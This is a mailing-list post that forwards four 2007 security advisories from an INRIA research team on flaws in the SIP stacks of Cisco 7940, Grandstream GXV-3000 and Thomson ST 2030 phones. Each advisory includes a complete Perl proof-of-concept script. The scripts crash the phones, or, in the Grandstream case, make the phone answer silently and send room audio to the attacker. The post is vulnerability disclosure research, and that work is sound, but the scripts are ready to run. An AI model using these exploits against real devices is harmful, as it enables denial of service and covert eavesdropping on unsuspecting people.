[Sip-implementors] fyi: various SIP stack vulnerabilities and exploits

Jeff . Hodges Fri, 31 Aug 2007 09:06:11 -0700

Of possible interest. These are recent posts to the "full-disclosure" list. 
There are four posts forwarded below.



=JeffH

------- Forwarded Messages

From: "Radu State" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Date: Mon, 20 Aug 2007 15:57:44 +0200
Subject: [Full-disclosure] 3 messsages attack remote DOS on Cisco 7940


MADYNES Security Advisory : stateful  SIP  remote DOS on  Cisco 7940

Date of Discovery 3 February, 2007

ID: KIPH5

Synopsis

After sending a series of three SIP messages the device reboots. The phone
does not check properly the state engine in the SIP stack
The vendor was informed  in March 2007 and acknowledged the vulnerability.
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first
vulnerabilities published where advanced state tracking is required.

Background 

*       SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session. 


Affected devices: Cisco phone 7940 (maybe other also) running firmware
P0S3-08-6-00 

 

Impact 
A malicious user can remotely crash and perform a denial of service attack
by sending three  crafted SIP  messages. 

Resolution
Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations. 

Credits

*       Humberto J. Abdelnur (Ph.D Student)
*       Radu State (Ph.D)
*       Olivier Festor (Ph.D)


This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH

 


Configuration of our device:

*       Current Firmware :  P0S3-08-6-00 
*       IP-Address obtained by DHCP as 192.168.1.8 
*       User Name: 7940-1

Vulnerability:

It is based in a sequence of messages, any of the particular messages may do
any harm by itself, but all of them turn the device in an inconsistent
state. The sequence is like:

X ------------------------- INVITE -----------------------> Cisco
X <--- 481 transaction does not exists -----  Cisco
X ------------------------- OPTIONS--------------------> Cisco
X <--------------------------- OK -------------------------  Cisco
X <--- 481 transaction does not exists -----  Cisco
X ------------------------- OPTIONS--------------------> Cisco

And the device reboots.

The INVITE sent has the particularity that the remote tag is already filled.
The following two OPTIONS messages must to have the same Call-ID as the
INVITE and the CSeq number must increment, otherwise the test does not work.


Exploit:

To run the exploit the file stateful-cisco-8.6.pl should be launched
(assuming our configurations) as:

perl stateful-cisco-8.6.pl 192.168.1.8 5060 7940-1

The script is simple and does not check if which messages are received, but
just wait a second before send the next one.

 

 

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

$msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r\nVia:
SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom:
<sip:[EMAIL PROTECTED]>;tag=00\r\nTo:
<sip:[EMAIL PROTECTED]>;tag=00\r\nCall-ID: [EMAIL PROTECTED]: 10
INVITE\r\nContent-Length: 0\r\n\r\n";;

$socket->send($msg);

 

sleep(1);

$msg ="OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=01\r\nFrom:
<sip:[EMAIL PROTECTED]>;tag=01\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nCall-ID: [EMAIL PROTECTED]: 11
OPTIONS\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(1);

$msg ="OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=02\r\nFrom:
<sip:[EMAIL PROTECTED]>;tag=02\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nCall-ID: [EMAIL PROTECTED]: 12
OPTIONS\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


------- Message 2

From: "Radu State" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Date: Mon, 20 Aug 2007 16:04:05 +0200
Subject: [Full-disclosure] 10 messages SIP Remote DOS on Cisco 7940 SIP Phone


MADYNES Security Advisory : stateful  SIP  remote DOS on  Cisco 7940

Date of Discovery 4  April, 2007

ID: KIPH6

Synopsis

After sending a series of ten SIP messages the device reboots. The phone
does not check properly the state engine in the SIP stack
The vendor was informed  in April 2007 and acknowledged the vulnerability.
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first
vulnerabilities published where advanced state tracking is required.

Background 

*       SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session. 


Affected devices: Cisco phone 7940 (maybe other also) running firmware
P0S3-08-6-00 

 

Impact :
A malicious user can remotely crash and perform a denial of service attack
by sending ten crafted SIP  messages. 

Resolution
Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations. 

Credits

*       Humberto J. Abdelnur (Ph.D Student)
*       Radu State (Ph.D)
*       Olivier Festor (Ph.D)


This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH

 


Configuration of our device:

*       Current Firmware :  P0S3-08-6-00 
*       IP-Address obtained by DHCP as 192.168.1.8 
*       User Name: 7940-3

 

 

 

Vulnerability:

It is based in a sequence of 10  messages, any of the particular messages
may do any harm by itself, but all of them turn the device in an
inconsistent state. The sequence is like:





X ------------------------- INVITE -----------------------> Cisco

X <--------------- 400 Bad Request  ---------------  Cisco

X <--------------- 400 Bad Request  ---------------  Cisco

X <--------------- 400 Bad Request  ---------------  Cisco

X <--------------- 400 Bad Request  ---------------  Cisco

X <--------------- 400 Bad Request  ---------------  Cisco

X ------------------------- OPTIONS--------------------> Cisco

X <--------------------- 200 OK -------------------------  Cisco

X ------------------------- OPTIONS--------------------> Cisco

X <--------------------- 200 OK -------------------------  Cisco

X <--------------- 400 Bad Request  ---------------  Cisco

X ------------------------- INVITE -----------------------> Cisco

X <--------------- 400 Bad Request  ---------------  Cisco

X <--------------- 400 Bad Request  ---------------  Cisco

X ------------------------- OPTIONS--------------------> Cisco

X <--------------- 404 Not Found ------------------  Cisco

X <--------------- 400 Bad Request  ---------------  Cisco

X <--------------- 400 Bad Request  ---------------  Cisco

X <--------------- 400 Bad Request  ---------------  Cisco

X ------------------------- OPTIONS--------------------> Cisco

X <--------------------- 200 OK -------------------------  Cisco

X ------------------------- INVITE -----------------------> Cisco

X <----------------100 Trying  -------------------------  Cisco

X <--------------- 404 Not Found ------------------  Cisco

X <--------------- 404 Not Found ------------------  Cisco

X <--------------- 404 Not Found ------------------  Cisco

X ------------------------- OPTIONS--------------------> Cisco

X <--------------------- 200 OK -------------------------  Cisco

X <--------------- 404 Not Found ------------------  Cisco

X ------------------------- OPTIONS--------------------> Cisco

X <--------------------- 200 OK -------------------------  Cisco

X <--------------- 404 Not Found ------------------  Cisco

...

 

And the device reboots  after a few seconds.

 

Exploit:

 

To run the exploit the file stateful-cisco-8.6.pl should be launched
(assuming our configurations) as:

 

perl stateful-cisco-8.6-v2.pl 192.168.1.8 5060 7940-3 192.168.1.2

 

It approximatively takes less than 2 minutes to reboot the device after the
script is launched.

The script is simple and does not check if which messages are received, but
just wait some time before send the next one.

 

 

 

POC Code 

 

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst-address> <dst-port> <dst_username> <src-address>" unless
($ARGV[3]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

 

$msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];branch=01;rport\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=01\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nCall-ID: [EMAIL PROTECTED]: 7532
INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYL,
REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length:
215\r\n\r\nv=0\r\no=r`ot 7213 7244 IN IP4 192.168.1.101\r\ns=session\r\nc=IN
IP4 192.168.1.101\r\nt=0 0\r\nm=aIdio 8000 RTP/AVP 0 101\r\na=rtpmau:0
PCMU/8000\r\na=rtpmap:101 telephone-event/80 0\r\na=fmtp:101
0-16\r\na=silenceSupp:off - - - -\r\n";

$socket->send($msg);

 

sleep(8.2);

$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=02\r\nCall-ID:
[EMAIL PROTECTED]: 79 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(1.5);

$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=03\r\nCall-ID:
[EMAIL PROTECTED]: 15853 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(3.3);

$msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=04\r\nCall-ID:
[EMAIL PROTECTED]: 36688 INVITE\r\nContent-Type:
application/sdp\r\nAllow: INVITE, ACK, BTE, CANCEL, OPTIONS, PRACK, REFEY,
NOTIFY, SUBSCRIBE, INFO\r\nSupported: 100rel\r\nUser-Agent:
Twinkle/0.9\r\nContent-Length: 314\r\n\r\nv=0\r\no=0231555775 2006994253
1729335607 IN IP4 192.168.1.101\r\ns=-\r\nc=IN IP4 192.168.1.101\r\nt=0
0\r\nm=audio 8002 RTP/AVP 98 97 8 0 3 101\r\na=rtpmap:98
speex/16000\r\na=rtpmap:97  peex/80-0\r\na=rtpmap:8 PCMA/8000\r\na=rtpmap:0
PCMU/8000\r\na=rtpma\x00:3 GSM/8000\r\na=rtpmap:101
telephone-event/8000\r\na=fmtp:101 0-15\r\na=ptime:20\r\n";

$socket->send($msg);

 

sleep(4);

$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=01\r\nCall-ID:
[EMAIL PROTECTED]: 21013 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(4);

$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=01\r\nCall-ID:
[EMAIL PROTECTED]: 18031 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(12);

$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom:  <sip:[EMAIL PROTECTED]>;tag=07\r\nCall-ID:
[EMAIL PROTECTED]: 41664 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(3);

$msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];branch=02;rport\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=08\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nContact: <sip:[EMAIL PROTECTED]>\r\nCall-ID:
[EMAIL PROTECTED]: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE,
ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type:
application/sdp\r\nContent-Length: 286\r\n\r\nv=0\r\no=root 7213 7217 IN IP4
192.168.1.4\r\ns=session\r\nc=IN IP4 192.168.1.4\r\nt=0 0\r\nm=audio 19024
RTP/AVP 0 3 8 97 101\r\na=rtpmap:0
PCMU/8000\r\na=rtpmap:3/GSM/8000\r\na=rtpmIp:8 PCMA/8000\r\na=rtpmap:97
spee8/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101
0-16\r\na=silenceSupp:off - - - -\r\n";

$socket->send($msg);

 

sleep(3);

$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=09\r\nCall-ID:
[EMAIL PROTECTED]: 18883 OPTIONS\r\nAccept:
application/sdp\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(3);

$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=10\r\nCall-ID:
[EMAIL PROTECTED]: 6298 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

 

------- Message 3

From: "Radu State" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Date: Wed, 22 Aug 2007 15:18:37 +0200
Subject: [Full-disclosure] Remote eavesdropping with SIP Phone GXV-3000

This is a multi-part message in MIME format.


 

While playing with the SIP  Madynes stateful fuzzer (for a description see
http://hal.inria.fr/inria-00166947/en), we have realized that some SIP stack
engines have serious bugs allowing to an attacker to automatically make a
remote phone accept the call

 without ringing and without asking the user to  take the phone from the
hook, such that the attacker might be able to listen to all conversations
that take place in the remote room without being noticed.

 

One example that we can disclose (vendor was notified on 10 th May 2007)
is the following:  Grandstream SIP Phone GXV-3000

 

 

MADYNES Security Advisory :  SIP  remote attack on  Grandstream SIP Phone
GXV-3000

 

Date of Discovery 7 th May, 2007

ID: KIPH7

Background 

SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session. 


Affected devices:  Grandstream SIP Phone GXV-3000 with latest available
firmware  1.0.1.7    Loader-- 1.0.0.6    Boot--1.0.0.18

Impact :
A malicious user can remotely eavesdrop (a remote location)  and perform DOS
on a remote phone. 
Resolution
Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations. 

The vulnerability is based in a sequence of two messages, where both
messages are syntactically right, but together they turn the device in an
inconsistent state, where the RTP is now send to the attacker/  

 

 

[EMAIL PROTECTED]:5060    is the attacker
[EMAIL PROTECTED]:5060    the attacked phone

 

      X ----------------------- INVITE ------------------->GXV-3000

      X <------------------ 100 Trying  -----------------  GXV-3000

      X <--------------- 180 Ringing -------------------   GXV-3000

      X ------------- 183 Session Progress ------->  GXV-3000

      X <-----------RTP - FLOW ------------------------  GXV-3000

 

After these  messages the device is not able to hang up so a remote DOS can
be also done

 

Credits:

*       Humberto J. Abdelnur (Ph.D Student) 
*       Radu State (Ph.D) 
*       Olivier Festor (Ph.D) 

Exploit Code :

 

To run the exploit the file Grandstream-GXV3000.pl should be launched
(assuming our configurations) as:

 

perl Grandstream-GXV3000.pl 152.81.48.88 5060 humbol 152.81.48.94 5060 ougui

 

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username> <src> <port> <username>" unless
($ARGV[5]);

 

$socket=new IO::Socket::INET->new(

        Proto=>'udp',

                               LocalPort => $ARGV[4],

                               PeerPort=>$ARGV[1],

        PeerAddr=>$ARGV[0]);

 

$sdp= "v=0\r

o=username 0 0 IN IP4 $ARGV[3]\r

s=The Funky Flow\r

c=IN IP4 $ARGV[3]\r

t=0 0\r

m=audio 33404 RTP/AVP 3 97 0 8\r

a=rtpmap:0 PCMU/8000\r

a=rtpmap:3 GSM/8000\r

a=rtpmap:8 PCMA/8000\r

a=rtpmap:97 iLBC/8000\r

a=fmtp:97 mode=30\r\n";

$sdplen= length $sdp;

$msg= "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r

Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r

From: <sip:[EMAIL PROTECTED]>\r

To:  <sip:[EMAIL PROTECTED]>\r

Contact: <sip:[EMAIL PROTECTED]>\r

Call-ID: [EMAIL PROTECTED]

CSeq: 10419 INVITE\r

Max-Forwards: 70\r

Content-Type: application/sdp\r

Content-Length: $sdplen\r

\r

$sdp";

$socket->send($msg);

sleep(3);

$msg= 

"SIP/2.0 183 Session Progress\r

Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r

From: <sip:[EMAIL PROTECTED]>\r

To: <sip:[EMAIL PROTECTED]>\r

Call-ID: [EMAIL PROTECTED]

CSeq: 10419 INVITE\r

Max-Forwards: 70\r

Contact: <sip:[EMAIL PROTECTED]>\r

Content-Type: application/sdp\r

Content-Length: $sdplen\r

\r

$sdp";

 

$socket->send($msg);

 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


------- Message 4

From: "Radu State" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Date: Thu, 23 Aug 2007 18:16:33 +0200
Subject: [Full-disclosure] DOS vulnerability on Thomson SIP phone ST 2030
        using the VIA Header


 

MADYNES Security Advisory :  Remote DOS on Thomson SIP phone  ST 2030

 

Date of Discovery 15  February, 2007

 

Vendor was notified on 1 March 2007

 

ID: KIPH8

 

Synopsis

 

After sending a message where the a space is replaced by a slash after the
SIP version in the VIA,  the device looks functional but in fact does not
respond to any event provoking a DoS. 

 

 

Background 

 

SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session. 

 

 

Affected devices:  Thomson SIP phone ST 2030

 

Impact :

A malicious user can remotely crash and perform a denial of service attack
by sending one crafted SIP  message. 

 

Resolution

Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations. 

 

Credits

 

Humberto J. Abdelnur (Ph.D Student) 

Radu State (Ph.D) 

Olivier Festor (Ph.D) 

 

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see
http://hal.inria.fr/inria-00166947/en),

 

 

 

Configuration of our device:

 

 

Software Version:   v1.52.1 

IP-Address obtained by DHCP as 192.168.1.106 

User name : thomson

 

 

To run the exploit the file thomson-2030-3.pl should be launched (assuming
our configurations) as:

 

 perl thomson-2030-3.pl 192.168.1.106 5060 thomson

 

 

POC Code :

 

 

!/usr/bin/perl

#Vulnerability for Thomson 2030 firmware v1.52.1

#It provokes a DoS in the device. 

 

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

$msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r\nVia:
SIP/2.0/UDP\\192.168.1.2;branch=00\r\nFrom: Caripe
<sip:[EMAIL PROTECTED]>;tag=00\r\nTo:
<sip:[EMAIL PROTECTED]>;tag=00\r\nCall-ID: [EMAIL PROTECTED]: 2
INVITE\r\n\r\n";

$socket->send($msg);

 

------- End of Forwarded Messages





_______________________________________________
Sip-implementors mailing list
[email protected]
https://lists.cs.columbia.edu/cucslists/listinfo/sip-implementors

[Sip-implementors] fyi: various SIP stack vulnerabilities and exploits

Reply via email to